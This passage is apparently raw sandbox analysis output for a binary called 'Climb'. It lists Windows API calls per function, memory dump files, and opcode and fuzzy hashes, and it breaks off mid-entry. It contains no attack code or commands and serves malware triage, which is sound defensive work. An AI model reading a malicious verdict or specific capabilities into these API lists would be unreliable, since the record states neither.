                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00AF87B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2294984445-0
                                                                                                                                                                          • Opcode ID: 0603ed2f9918a2ad8891007ff02d38906828303abaee8fc58ab9227bb2e3b0d7
                                                                                                                                                                          • Instruction ID: 9eab3862e7e9b7b83703ce1c54158d8dcd644d2b626d44e613beda13b75f0348
                                                                                                                                                                          • Opcode Fuzzy Hash: 0603ed2f9918a2ad8891007ff02d38906828303abaee8fc58ab9227bb2e3b0d7
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D2192716102499FCB25AFB8CC08B7E3BA6EB45325F354629FA26C31E0DF349851CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00A836E9,00A83355), ref: 00A83700
                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A8370E
                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A83727
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00A836E9,00A83355), ref: 00A83779
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                          • Opcode ID: 0ccd0232e5f51e80ade9174cecf82e686bdf6aefd39c4bc1751026df172c1891
                                                                                                                                                                          • Instruction ID: eea1d5ffbc078ab6401bbb59d7767937a6e5488abe8bfa65c62242deb041e9df
                                                                                                                                                                          • Opcode Fuzzy Hash: 0ccd0232e5f51e80ade9174cecf82e686bdf6aefd39c4bc1751026df172c1891
                                                                                                                                                                          • Instruction Fuzzy Hash: 8201B5B361A3116EAE3577B5AD9A96B2694EB05FB17300329F110450F0EF528D029340
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00A84D53,00000000,?,?,00A868E2,?,?,00000000), ref: 00A930EB
                                                                                                                                                                          • _free.LIBCMT ref: 00A9311E
                                                                                                                                                                          • _free.LIBCMT ref: 00A93146
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A93153
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A9315F
                                                                                                                                                                          • _abort.LIBCMT ref: 00A93165
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                          • Opcode ID: 0fa1e1deaf5fb8bd6a1222e0c8f5188e11eeddd86c8969e86dedea519fc9052b
                                                                                                                                                                          • Instruction ID: 7b383a48eed0051fa2554c0eaf484a035de8f57ba0e569a8a7e6f6c5f4b5914c
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fa1e1deaf5fb8bd6a1222e0c8f5188e11eeddd86c8969e86dedea519fc9052b
                                                                                                                                                                          • Instruction Fuzzy Hash: 07F0A43B74550036CF226775AE06B6E26FA9FC5771B310624FA24E62F1EF208A039261
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A61F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A61F87
                                                                                                                                                                            • Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61F96
                                                                                                                                                                            • Part of subcall function 00A61F2D: BeginPath.GDI32(?), ref: 00A61FAD
                                                                                                                                                                            • Part of subcall function 00A61F2D: SelectObject.GDI32(?,00000000), ref: 00A61FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AF94AA
                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 00AF94BE
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AF94CC
                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 00AF94DC
                                                                                                                                                                          • EndPath.GDI32(?), ref: 00AF94EC
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 00AF94FC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                          • Opcode ID: 596a31b574389c0f404ef63fe51717cdbc530c102726e332e9f0b7aa63c7f97b
                                                                                                                                                                          • Instruction ID: d43a8479f4969530c90ff01e3b139f2e7e92e562796eeab7f9203a923f3287a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 596a31b574389c0f404ef63fe51717cdbc530c102726e332e9f0b7aa63c7f97b
                                                                                                                                                                          • Instruction Fuzzy Hash: B111DB7600010DBFDF129FD0EC89FAA7F6DEF09364F048121BA1A5A161CB719D56DBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00AC5B7C
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AC5B8D
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AC5B94
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00AC5B9C
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AC5BB3
                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AC5BC5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: 6935c3047500e68160dad541d095d0ea4161058b95988209a9dcc3136ba25f39
                                                                                                                                                                          • Instruction ID: 8d86e8bd5637c794c211e5ae3cdd5cf207d881ab1f0035ea4cdc04f8a10723c6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6935c3047500e68160dad541d095d0ea4161058b95988209a9dcc3136ba25f39
                                                                                                                                                                          • Instruction Fuzzy Hash: 72012C75E00719BBEB119FE59C49F5ABFA9EB49751F004065FA09AB280D670AC01CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A632AF
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A632B7
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A632C2
                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A632CD
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A632D5
                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A632DD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                          • Opcode ID: f3a23c14ba269a954110fcaf3999ec1a4bd999fd081b9f50ecdae87c13c35ba1
                                                                                                                                                                          • Instruction ID: 5ec83647ed8a1cd5789ed64cea91877a0f4d656acff668ff5690efec7c10c8fc
                                                                                                                                                                          • Opcode Fuzzy Hash: f3a23c14ba269a954110fcaf3999ec1a4bd999fd081b9f50ecdae87c13c35ba1
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00ACF447
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00ACF45D
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00ACF46C
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF47B
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF485
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00ACF48C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                          • Opcode ID: ad9b44805ca720a69323f0bedd9a1c3abfaec990df22607af0879e193d90a407
                                                                                                                                                                          • Instruction ID: dea3140df969f2a86b8ac40817a24162a5cda04aa20251a8b0cecf50debf82a2
                                                                                                                                                                          • Opcode Fuzzy Hash: ad9b44805ca720a69323f0bedd9a1c3abfaec990df22607af0879e193d90a407
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF03A32241158BBE7229BE29C0EEFF7B7DEFC6B11F000158F601D6090D7A46A42D6B9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?), ref: 00AA34EF
                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00AA3506
                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00AA3512
                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00AA3521
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00AA3533
                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 00AA354D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                          • Opcode ID: b19ffb30b8fe7bc28b7602d35dc377e23d0a0638c49cff621d45b07d26fe2551
                                                                                                                                                                          • Instruction ID: 6a9321004098f0606b98913d9123bfecb0958460368206b466d8442c542f4e40
                                                                                                                                                                          • Opcode Fuzzy Hash: b19ffb30b8fe7bc28b7602d35dc377e23d0a0638c49cff621d45b07d26fe2551
                                                                                                                                                                          • Instruction Fuzzy Hash: 26012832500205EFDB629BE4DC08BF97BB2FB05321F500164F91AA61A0CB321E52EB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AC21CC
                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00AC21D8
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AC21E1
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AC21E9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AC21F2
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00AC21F9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                          • Opcode ID: 02d510f360ffff390b412db2c7c4c7bfdc0cae294f2e6fbbb191420a0fe8440f
                                                                                                                                                                          • Instruction ID: 5e67eab92aad4dd905ac620024404d58df7c01488737728aa2212d7c8f91cf83
                                                                                                                                                                          • Opcode Fuzzy Hash: 02d510f360ffff390b412db2c7c4c7bfdc0cae294f2e6fbbb191420a0fe8440f
                                                                                                                                                                          • Instruction Fuzzy Hash: D1E0E576004105BBDB02AFE1EC0CD2ABF3AFF49322B104320F32586070CB329422EB54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACCF99
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00ACCFE0
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00ACD047
                                                                                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00ACD075
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1227352736-4108050209
                                                                                                                                                                          • Opcode ID: 8d8aa7ff810b9b84f25f8fbb6c1f3f555915faafeb4bda98e306c650ec80f75d
                                                                                                                                                                          • Instruction ID: e0cfe2baa1f0a46dfaf795d332e2826771657de55090142915287f69b1286d27
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d8aa7ff810b9b84f25f8fbb6c1f3f555915faafeb4bda98e306c650ec80f75d
                                                                                                                                                                          • Instruction Fuzzy Hash: 1551CE716043009BD715AF28C945F6BBBE8AF45324F050A3DF99AE7191DB70CD45C792
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00AEB903
                                                                                                                                                                            • Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF
                                                                                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 00AEB998
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEB9C7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                          • String ID: <$@
                                                                                                                                                                          • API String ID: 146682121-1426351568
                                                                                                                                                                          • Opcode ID: cd355af299a16884806a59d709ba3a138efde2d2e855b5b7edba87f39bd97bcc
                                                                                                                                                                          • Instruction ID: bbb16dbcdf3ab081f93cec62dd78d53b48d2facf7fc5709bdc872dccf395e981
                                                                                                                                                                          • Opcode Fuzzy Hash: cd355af299a16884806a59d709ba3a138efde2d2e855b5b7edba87f39bd97bcc
                                                                                                                                                                          • Instruction Fuzzy Hash: 59718A75A10215DFCB10EFA5C598A9EBBF5FF08310F048499E856AB392CB35ED41CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AC7B6D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AC7BA3
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AC7BB4
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AC7C36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                          • API String ID: 753597075-1075368562
                                                                                                                                                                          • Opcode ID: 73e4b2b516fe2689c3f28295d66eb5f2b980ae93216866e353a9ee10850e2490
                                                                                                                                                                          • Instruction ID: a6235968fee3eac765fd4767266865c6a80346f95337d87d6473ecc755d8b681
                                                                                                                                                                          • Opcode Fuzzy Hash: 73e4b2b516fe2689c3f28295d66eb5f2b980ae93216866e353a9ee10850e2490
                                                                                                                                                                          • Instruction Fuzzy Hash: BB417BB1608206AFDB15DF64D884FAE7BB9EF44310F1580ADA9069F205DBB0DD44CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF48D1
                                                                                                                                                                          • IsMenu.USER32(?), ref: 00AF48E6
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF492E
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00AF4941
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 3076010158-4108050209
                                                                                                                                                                          • Opcode ID: a61cd53c8a4bb9c03e443634647073313d227b40fd6eef55a563a3ca3cb11578
                                                                                                                                                                          • Instruction ID: 616ce544dc4903ab37281fdda6248b747382a277c2b998dbe538e9eeca579caf
                                                                                                                                                                          • Opcode Fuzzy Hash: a61cd53c8a4bb9c03e443634647073313d227b40fd6eef55a563a3ca3cb11578
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F414C75A0020DEFDB20CFA1D8C4AABBBB5FF09364F148129FA4597260D770AD45CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AC27B3
                                                                                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AC27C6
                                                                                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AC27F6
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
